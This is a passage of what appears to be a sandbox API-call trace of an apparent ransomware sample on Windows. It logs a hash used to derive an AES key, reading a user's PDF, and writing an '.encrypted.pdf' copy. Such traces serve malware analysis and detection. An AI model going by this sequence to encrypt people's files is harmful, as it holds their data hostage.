cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BW8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Co4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wsRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sRFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RFvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fvd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vd3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.557] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SaeI.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.557] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.558] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.558] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.558] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cd66a20, ftCreationTime.dwHighDateTime=0x1d5c3a8, ftLastAccessTime.dwLowDateTime=0xa69c42f0, ftLastAccessTime.dwHighDateTime=0x1d5bc28, ftLastWriteTime.dwLowDateTime=0xa69c42f0, ftLastWriteTime.dwHighDateTime=0x1d5bc28, nFileSizeHigh=0x0, nFileSizeLow=0x3a10, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="3p0Co4O-wsRFvd3SaeI.pdf", cAlternateFileName="3P0CO4~1.PDF")) returned 0x7c2100 [0035.558] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0035.558] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.558] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.558] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0035.558] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0035.558] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.558] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0035.559] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0035.559] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.559] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0035.559] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0035.559] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.559] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0035.560] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.560] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.560] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.560] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0035.560] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0035.560] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.560] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.560] CryptHashData (hHash=0x7c2240, pbData=0x7c9798, dwDataLen=0x100, dwFlags=0x1) returned 1 [0035.560] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.560] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.560] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.560] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0035.560] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.561] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.561] CryptDestroyHash (hHash=0x7c2240) returned 1 [0035.561] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\3p0co4o-wsrfvd3saei.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.561] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.561] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.561] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.561] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.561] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.561] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0035.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c9798 [0035.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.562] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0035.562] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9798 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0035.563] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x")) returned 0x10 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.563] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.563] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0035.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\3p0Co4O-wsRFvd3SaeI.encrypted.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\3p0co4o-wsrfvd3saei.encrypted.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.564] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.564] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0035.564] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0035.564] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.564] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0035.564] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0035.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0035.565] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0035.565] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.565] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.565] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x3a10, lpOverlapped=0x0) returned 1 [0035.566] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0035.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0035.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a10) returned 0x955018 [0035.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3a10) returned 0x958a30 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 